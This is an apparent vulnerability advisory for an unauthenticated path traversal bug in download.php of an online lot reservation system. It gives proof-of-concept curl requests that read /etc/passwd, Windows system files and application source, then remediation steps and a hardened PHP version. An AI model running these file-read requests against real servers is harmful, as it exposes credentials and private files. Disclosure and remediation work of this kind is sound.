# Vulnerability Summary: Arbitrary File Reading in Online Lot Reservation System V1.0

## Vulnerability Overview

* **Project Name**: Online Lot Reservation System V1.0
* **Vulnerable File**: `download.php`
* **Vulnerability Type**: Arbitrary File Reading (path traversal)
* **Cause**: The `file` parameter in `download.php` is passed directly to `readfile()` without any filtering or validation. Because the raw parameter value becomes the path that is read, an attacker can escape the intended directory with `../` sequences or simply supply an absolute path, and the server returns any file that the web server process is allowed to read.

## Impact Scope

* The vulnerability is exploitable without authentication or authorization.
* Any file readable by the web server process can be disclosed, including:
  * Database configuration files (potentially exposing database credentials).
  * Sensitive system files (e.g., `/etc/passwd`, `C:\Windows\System32\drivers\etc\hosts`).
  * Application source code and other sensitive information.

## Proof of Concept (PoC)

```bash
# Read a Windows system file (absolute path)
curl "http://127.0.0.1:7777/onlinelot/download.php?file=C:\Windows\win.ini"

# Read the hosts file
curl "http://127.0.0.1:7777/onlinelot/download.php?file=C:\Windows\System32\drivers\etc\hosts"

# Read application source code (index.php in the web root); the database
# configuration file is reachable with the same request pattern
curl "http://127.0.0.1:7777/onlinelot/download.php?file=./index.php"

# On a Linux host the same bug yields system files, e.g. /etc/passwd
curl "http://127.0.0.1:7777/onlinelot/download.php?file=/etc/passwd"
```

## Remediation

1. **Restrict reads to an allowed directory**: resolve the requested path with `realpath()` and serve it only if it resolves inside the download directory. `realpath()` returns `false` for paths that do not exist, and it follows symlinks, so both the `false` case and the prefix check are needed:

   ```php
   $allowed_dir = realpath(__DIR__ . '/downloads');
   $real_path   = realpath($allowed_dir . '/' . $file);
   // false means the file does not exist; a resolved path that does not start with
   // the allowed directory plus a separator has escaped it (via ../, an absolute path, or a symlink)
   if ($real_path === false || strpos($real_path, $allowed_dir . DIRECTORY_SEPARATOR) !== 0) {
       die('Invalid file path');
   }
   readfile($real_path);
   ```

2. **Path Traversal Protection**: call `basename()` on the parameter to strip all directory components, so `../../etc/passwd` becomes `passwd` and the name is then looked up only inside the fixed download directory. `basename()` alone is not a fix if its result is still joined to an attacker-influenced directory; combine it with step 1.

3. **File Type Restrictions**: serve only an explicit allowlist of extensions (e.g., documents and images), so that files inside the download directory that were never meant to be public, such as `.php` sources, are not disclosed either.

4. **Disable Directory Listing**: configure the web server to deny directory listing. This is defense in depth only; it does not stop `readfile()` from following a traversed path, so it must not be relied on as the fix for this bug.
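The four remediation steps above fit together into a single hardened `download.php`. The following is an added example written for this page, not the project's own code: the `downloads/` directory name, the extension allowlist, the HTTP status codes and the response headers are assumptions chosen for illustration.

```php
<?php
// Added example, not the project's download.php. The vulnerable pattern it replaces is:
//     readfile($_GET['file']);
// Assumptions: files to be served live in ./downloads/ next to this script, and only
// the extensions listed below are meant to be public.

declare(strict_types=1);

// Step 1: confine reads to one directory, canonicalised to an absolute path.
$allowedDir = realpath(__DIR__ . '/downloads');
if ($allowedDir === false) {
    http_response_code(500);
    exit('Download directory is not configured');
}

// Step 3: allowlist of file types the application intentionally publishes (assumed set).
$allowedExtensions = ['pdf', 'png', 'jpg', 'jpeg', 'txt'];

// Reject missing, empty, or non-string values (file[]=... would arrive as an array).
$requested = $_GET['file'] ?? '';
if (!is_string($requested) || $requested === '') {
    http_response_code(400);
    exit('Missing file parameter');
}

// Step 2: strip every directory component. "../../etc/passwd" becomes "passwd";
// on Windows PHP also treats "\" as a separator, so "C:\Windows\win.ini" becomes "win.ini".
$name = basename($requested);

// Refuse names that could still misbehave: empty result, dotfiles, embedded NUL bytes.
if ($name === '' || $name[0] === '.' || strpos($name, "\0") !== false) {
    http_response_code(400);
    exit('Invalid file name');
}

$ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
if (!in_array($ext, $allowedExtensions, true)) {
    http_response_code(403);
    exit('File type not permitted');
}

// Canonicalise the final path and verify it is still inside $allowedDir.
// realpath() follows symlinks, so a symlink inside downloads/ that points
// outside the directory is rejected here as well.
$target = realpath($allowedDir . DIRECTORY_SEPARATOR . $name);
if ($target === false
    || strpos($target, $allowedDir . DIRECTORY_SEPARATOR) !== 0
    || !is_file($target)) {
    http_response_code(404);
    exit('File not found');
}

// Serve as a download; the RFC 5987 filename* form avoids header injection via the name.
header('Content-Type: application/octet-stream');
header("Content-Disposition: attachment; filename*=UTF-8''" . rawurlencode($name));
header('Content-Length: ' . (string) filesize($target));
readfile($target);
```

With this version each of the PoC requests above fails before `readfile()` is reached: `C:\Windows\win.ini` and `/etc/passwd` are reduced by `basename()` to a bare file name that does not exist under `downloads/`, and `./index.php` is reduced to `index.php`, which is rejected by the extension allowlist even if a copy were placed in the download directory. Step 4 (denying directory listing) is a web server setting rather than application code and is left to the server configuration.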